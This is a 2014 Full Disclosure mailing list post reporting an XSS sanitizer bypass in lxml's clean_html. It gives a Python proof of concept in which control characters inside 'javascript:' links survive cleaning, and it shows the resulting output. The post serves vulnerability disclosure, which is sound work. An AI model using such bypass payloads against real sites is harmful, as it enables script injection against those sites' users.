Full Disclosure mailing list archives
lxml (python lib) vulnerability
From: Максим Кочкин <maxxarts () gmail com>
Date: Tue, 15 Apr 2014 22:30:12 +0400
Hi, all I've accidentally found vulnerability in clean_html function of lxml python library. User can break schema of url with nonprinted chars (\x01-\x08). Seems like all versions including the latest 3.3.4 are vulnerable. Here is PoC. from lxml.html.clean import clean_html html = '''\ <html> <body> <a href="javascript:alert(0)"> aaa</a> <a href="javas\x01cript:alert(1)">bbb</a> <a href="javas\x02cript:alert(1)">bbb</a> <a href="javas\x03cript:alert(1)">bbb</a> <a href="javas\x04cript:alert(1)">bbb</a> <a href="javas\x05cript:alert(1)">bbb</a> <a href="javas\x06cript:alert(1)">bbb</a> <a href="javas\x07cript:alert(1)">bbb</a> <a href="javas\x08cript:alert(1)">bbb</a> <a href="javas\x09cript:alert(1)">bbb</a> </body> </html>''' print clean_html(html) Output: <div> <body> <a href="">aaa</a> <a href="javascript:alert(1)"> bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="">bbb</a> </body> </div> I've emailed lxml-guys. Hope they'll fix it soon. ---- ksimka (@m_ksimka) _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- lxml (python lib) vulnerability Максим Кочкин (Apr 15)
- Re: lxml (python lib) vulnerability Źmicier Januszkiewicz (Apr 30)